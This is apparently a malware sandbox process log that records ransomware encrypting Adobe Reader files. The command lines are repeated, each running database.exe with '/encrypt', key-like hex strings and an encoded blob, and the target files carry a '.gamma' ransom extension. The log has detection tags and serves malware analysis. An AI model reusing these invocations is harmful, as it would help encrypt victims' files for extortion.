C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.id-DA208E5B.[[email protected]].gamma"5⤵PID:5456
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.id-DA208E5B.[[email protected]].gamma"5⤵PID:4088
-
-
C:\Users\Admin\AppData\Roaming\database.exe"C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.id-DA208E5B.[[email protected]].gamma"5⤵PID:3520
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3768
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:2680
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6088
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6580
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:2604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6576
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6844
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4164
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:5980
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3708
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3132
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6364
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6396
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3684
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:5388
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6016
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4768
-
-
